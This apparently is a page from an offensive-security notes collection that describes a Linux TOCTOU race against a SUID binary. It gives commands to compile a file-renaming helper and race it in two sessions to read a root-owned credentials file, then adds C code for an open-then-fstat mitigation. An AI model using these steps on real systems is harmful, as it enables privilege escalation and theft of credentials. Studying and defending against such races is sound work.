killchain-compendium/exploit/linux/racing_conditions.md

Racing Conditions

Read files from another user

  • The file of interest must be opened by a process that is a SUID binary (here named read_creds), which creates a file descriptor to it
  • The file of interest is called root_credentials and is owned by root
  • Create a file and compile the renaming helper
touch yo
gcc gistfile.c -o rename_file
  • Inside session 1, start the binary
./rename_file yo root_credentials
  • Inside session 2, try to read root_credentials until it succeeds
./read_creds root_credentials
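
The race above only works when the SUID reader validates a path name and then opens that name as a separate step. As an added example (not code from this page or from read_creds), the sketch below shows the mitigation: open first, then check ownership on the descriptor. The helper name open_checked and the policy "regular file owned by the invoking user" are assumptions made for illustration.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: open `path` for reading only if it is a regular file
 * owned by `caller`. The checks run on the descriptor after open(), so
 * renaming or swapping the path afterwards cannot change what was checked. */
int open_checked(const char *path, uid_t caller)
{
    struct stat st;
    /* O_NOFOLLOW: refuse a symlink in the final path component.
     * O_NONBLOCK: do not hang if the path turns out to be a FIFO. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);
    if (fd < 0)
        return -1;
    /* fstat() describes the inode we actually hold, not whatever the
     * name points to now. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != caller) {
        close(fd);
        return -1;
    }
    return fd;
}

int main(int argc, char **argv)
{
    char buf[4096];
    ssize_t n;
    if (argc != 2) {
        fprintf(stderr, "usage: %s FILE\n", argv[0]);
        return 2;
    }
    /* getuid() is the real (invoking) user even when the binary is SUID. */
    int fd = open_checked(argv[1], getuid());
    if (fd < 0) {
        fprintf(stderr, "refusing to read %s\n", argv[1]);
        return 1;
    }
    while ((n = read(fd, buf, sizeof buf)) > 0)
        fwrite(buf, 1, (size_t)n, stdout);
    close(fd);
    return 0;
}
```

Because the ownership test is bound to the opened inode, a file that is swapped in under the same name between check and use is still rejected when it belongs to root.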